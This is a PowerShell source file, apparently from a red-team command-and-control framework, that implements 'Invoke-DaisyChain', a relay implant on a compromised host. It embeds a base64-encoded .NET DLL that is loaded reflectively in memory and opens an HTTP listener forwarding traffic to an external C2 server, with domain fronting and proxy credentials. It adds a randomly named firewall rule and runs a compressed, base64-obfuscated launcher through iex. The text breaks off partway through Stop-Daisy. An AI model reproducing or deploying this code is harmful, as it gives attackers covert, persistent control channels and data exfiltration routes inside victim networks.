<#
.Synopsis
    Invoke-DaisyChain

    Ben Turner @benpturner

.DESCRIPTION
	PS C:\> Invoke-DaisyChain -daisyserver http://192.168.1.1 -port 80 -c2port 80 -c2server http://c2.goog.com -domfront aaa.clou.com -proxyurl http://10.0.0.1:8080 -proxyuser dom\test -proxypassword pass -localhost (optional if low level user)
.EXAMPLE
    PS C:\> Invoke-DaisyChain -daisyserver http://192.168.1.1 -port 80 -c2port 80 -c2server http://c2.goog.com -domfront aaa.clou.com -proxyurl http://10.0.0.1:8080
.EXAMPLE
    PS C:\> Invoke-DaisyChain -daisyserver http://10.150.10.20 -port 8888 -c2port 8888 -c2server http://10.150.10.10 -URLs '"pwned/test/123","12345/drive/home.php"'
#>
$Global:firewallName = ""
$Global:serverPort = ""
function Invoke-DaisyChain {

param(
[Parameter(Mandatory=$true)][string]$port, 
[Parameter(Mandatory=$true)][string]$daisyserver,
[Parameter(Mandatory=$true)][string]$c2server, 
[Parameter(Mandatory=$true)][string]$c2port,
[Parameter(Mandatory=$true)][string]$URLs,
[Parameter(Mandatory=$false)][switch]$Localhost,
[Parameter(Mandatory=$false)][switch]$NoFWRule,
[Parameter(Mandatory=$false)][AllowEmptyString()][string]$domfront, 
[Parameter(Mandatory=$false)][AllowEmptyString()][string]$proxyurl, 
[Parameter(Mandatory=$false)][AllowEmptyString()][string]$proxyuser, 
[Parameter(Mandatory=$false)][AllowEmptyString()][string]$proxypassword
)

if ($firewallName) {
    echo "[-] DaisyServer already ran in this implant cannot run twice due to prefixes being defined"

} else {
    
$fw = Get-FirewallName -Length 15
$script:firewallName = $fw
$firewallName = $fw 
$script:serverPort = $port
$serverPort = $port

if ($Localhost.IsPresent){
echo "[+] Using localhost parameter"
$HTTPServer = "localhost"
$daisyserver = "http://localhost"
$NoFWRule = $true
} else {
$HTTPServer = "+"
}

$script:serverPort = $port
if ($NoFWRule.IsPresent) {
    $fwcmd = "echo `"No firewall rule added`""
}else {
    echo "Adding firewall rule name: $firewallName for TCP port $port"
    echo "Netsh.exe advfirewall firewall add rule name=`"$firewallName`" dir=in action=allow protocol=TCP localport=$port enable=yes"
    $fwcmd = "Netsh.exe advfirewall firewall add rule name=`"$firewallName`" dir=in action=allow protocol=TCP localport=$port enable=yes"
}

$fdsf = @"
`$URLS = $($URLS)
`$Asm = "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VEY4ADw+OQA8TW9kdWxlPgBTeXN0ZW0uSU8AVXBsb2FkRGF0YQBtc2NvcmxpYgA8PmMAUmVhZABBZGQAU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkAGdldF9IdHRwTWV0aG9kAHByb3h5cGFzc3dvcmQAc2V0X1N0YXR1c0NvZGUAQ3JlZGVudGlhbENhY2hlAGNvb2tpZQBJRGlzcG9zYWJsZQBnZXRfQXN5bmNXYWl0SGFuZGxlAENvbnNvbGUAV2FpdE9uZQBXcml0ZUxpbmUAZ2V0X1Jlc3BvbnNlAEh0dHBMaXN0ZW5lclJlc3BvbnNlAGh0dHByZXNwb25zZQBDbG9zZQBEaXNwb3NlAFg1MDlDZXJ0aWZpY2F0ZQBXcml0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBCeXRlAFN5c3RlbS5UaHJlYWRpbmcARW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBEb3dubG9hZFN0cmluZwBUb1N0cmluZwBTdG9wd2F0Y2gARmx1c2gAZ2V0X0xlbmd0aABVcmkAQXN5bmNDYWxsYmFjawBSZW1vdGVDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjawBzZXRfU2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sATGlzdGVuZXJDYWxsYmFjawBzZXRfQnlwYXNzUHJveHlPbkxvY2FsAE5ldHdvcmtDcmVkZW50aWFsAERhaXN5LmRsbABnZXRfUmF3VXJsAHByb3h5dXJsAGdldF9JbnB1dFN0cmVhbQBnZXRfT3V0cHV0U3RyZWFtAE1lbW9yeVN0cmVhbQBTeXN0ZW0AWDUwOUNoYWluAFN5c3RlbS5SZWZsZWN0aW9uAENvb2tpZUNvbGxlY3Rpb24ATmFtZVZhbHVlQ29sbGVjdGlvbgBXZWJIZWFkZXJDb2xsZWN0aW9uAEh0dHBMaXN0ZW5lclByZWZpeENvbGxlY3Rpb24Ac2V0X1Bvc2l0aW9uAEV4Y2VwdGlvbgBzZXRfU3RhdHVzRGVzY3JpcHRpb24AU3RvcABIdHRwUmVxdWVzdEhlYWRlcgBkb21haW5mcm9udGhlYWRlcgBTZXJ2aWNlUG9pbnRNYW5hZ2VyAGJvb2xMaXN0ZW5lcgBIdHRwTGlzdGVuZXIAbGlzdGVuZXIAcmVmZXJlcgBwcm94eXVzZXIARGFpc3lTZXJ2ZXIAaHR0cHNlcnZlcgBJRW51bWVyYXRvcgBHZXRFbnVtZXJhdG9yAC5jdG9yAC5jY3RvcgBVUkxzAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBnZXRfQ29va2llcwBzZXRfQXV0aGVudGljYXRpb25TY2hlbWVzAFN5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuWDUwOUNlcnRpZmljYXRlcwBBbGxvd1VudHJ1c3RlZENlcnRpZmljYXRlcwBHZXRCeXRlcwBnZXRfUHJlZml4ZXMASUNyZWRlbnRpYWxzAHNldF9DcmVkZW50aWFscwBnZXRfRGVmYXVsdENyZWRlbnRpYWxzAHNldF9Vc2VEZWZhdWx0Q3JlZGVudGlhbHMAQ29udGFpbnMAU3lzdGVtLkNvbGxlY3Rpb25zAGdldF9IZWFkZXJzAFNzbFBvbGljeUVycm9ycwBzZXRfQWRkcmVzcwBDb25jYXQARm9ybWF0AE9iamVjdABTeXN0ZW0uTmV0AElBc3luY1Jlc3VsdAByZXN1bHQAdXNlcmFnZW50AFdlYkNsaWVudABnZXRfQ3VycmVudABTdGFydABodHRwc2VydmVycG9ydABnZXRfUmVxdWVzdABXZWJSZXF1ZXN0AEh0dHBMaXN0ZW5lclJlcXVlc3QAUHJvY2Vzc1JlcXVlc3QATW92ZU5leHQAU3lzdGVtLlRleHQASHR0cExpc3RlbmVyQ29udGV4dABFbmRHZXRDb250ZXh0AEJlZ2luR2V0Q29udGV4dABTdGFydE5ldwB4AFN0YXJ0RGFpc3kAb3BfRXF1YWxpdHkAU3lzdGVtLk5ldC5TZWN1cml0eQBJc051bGxPckVtcHR5AGdldF9Qcm94eQBzZXRfUHJveHkASVdlYlByb3h5AHoAAB9oAHQAdABwADoALwAvAHsAMAB9ADoAewAxAH0ALwAACUgAbwBzAHQAABVVAHMAZQByAC0AQQBnAGUAbgB0AAEPUgBlAGYAZQByAGUAcgAAG1MAZQBzAHMAaQBvAG4ASQBEAD0AewAwAH0AADUvAHAAbAB1AGcAaQBuAHMALwA3ADcALwB2ADEALgAwAC8AcwB0AGEAdABzAC4AcABoAHAAAAl7ADAAfQA7AAAHRwBFAFQAAA17ADAAfQB7ADEAfQAACVAATwBTAFQAABlDAGEAYwBoAGUAQwBvAG4AdAByAG8AbAAAR24AbwAtAGMAYQBjAGgAZQAsACAAbgBvAC0AcwB0AG8AcgBlACwAIABtAHUAcwB0AC0AcgBlAHYAYQBsAGkAZABhAHQAZQABDVAAcgBhAGcAbQBhAAARbgBvAC0AYwBhAGMAaABlAAEPRQB4AHAAaQByAGUAcwAAAzAAAAVPAEsAAICXTQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADMAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIABUAG8AdQBjAGgAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AAAEAgf08ACEARABPAEMAVABZAFAARQAgAEgAVABNAEwAIABQAFUAQgBMAEkAQwAgACIALQAvAC8ASQBFAFQARgAvAC8ARABUAEQAIABIAFQATQBMACAAMgAuADAALwAvAEUATgAiAD4ADQAKADwA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ZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAwAAAAYPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
`$DllBytes  = [System.Convert]::FromBase64String(`$Asm)
`$Assembly = [System.Reflection.Assembly]::Load(`$DllBytes)
`$DaisyServer = New-Object DaisyServer
[DaisyServer]::server = "${c2server}:${c2port}"
[DaisyServer]::httpserverport = "$port"
[DaisyServer]::httpserver = "$HTTPServer"
[DaisyServer]::useragent = "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"
[DaisyServer]::URLs = @($($URLS))
[DaisyServer]::proxyurl = "$proxyurl"
[DaisyServer]::proxyuser = "$proxyuser"
[DaisyServer]::proxypassword = "$proxypassword"
[DaisyServer]::domainfrontheader = "$domfront"
[DaisyServer]::referer = `$null
[DaisyServer]::StartDaisy()
"@

$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($fdsf)
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
$DeflateStream.Dispose()
$CompressedScriptBytes = $CompressedStream.ToArray()
$CompressedStream.Dispose()
$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
$NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'

if ($domfront -and (($psversiontable.CLRVersion.Major -lt 3))) {
    echo "[-] When using domain fronting and daisy chaining the .NET version needs to be v4 or above"
} 


$t = Invoke-Netstat| ? {$_.ListeningPort -eq $port}
$global:kill = [HashTable]::Synchronized(@{})
$kill.log = "1"

$fwcmd|iex

if (!$t) { 
    if (Test-Administrator) { 
        $Runspace = [RunspaceFactory]::CreateRunspace()
        $Runspace.Open()
        $Runspace.SessionStateProxy.SetVariable('Kill',$Kill)
        $Jobs = @()
        $Job = [powershell]::Create().AddScript($NewScript)
        $Job.Runspace = $Runspace
        $Job.BeginInvoke() | Out-Null
        echo ""
        echo "[+] Running DaisyServer as Administrator:"
    } else { 
        $Runspace = [RunspaceFactory]::CreateRunspace()
        $Runspace.Open()
        $Runspace.SessionStateProxy.SetVariable('Kill',$Kill)
        $Jobs = @()
        $Job = [powershell]::Create().AddScript($NewScript)
        $Job.Runspace = $Runspace
        $Job.BeginInvoke() | Out-Null 
        echo ""
        echo "[+] Running DaisyServer as Standard User, must use -localhost flag for this to work:"
    }  

    echo "[+] To stop the Daisy Server, run StopDaisy in the current process"
}
}


}
function Stop-Daisy {    
    try {
        $webClient = New-Object System.Net.WebClient
        $webClient.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()
        $webClient.DownloadString("http://localhost:$serverPort/plugins/77/v1.0/stats.php")|Out-Null            
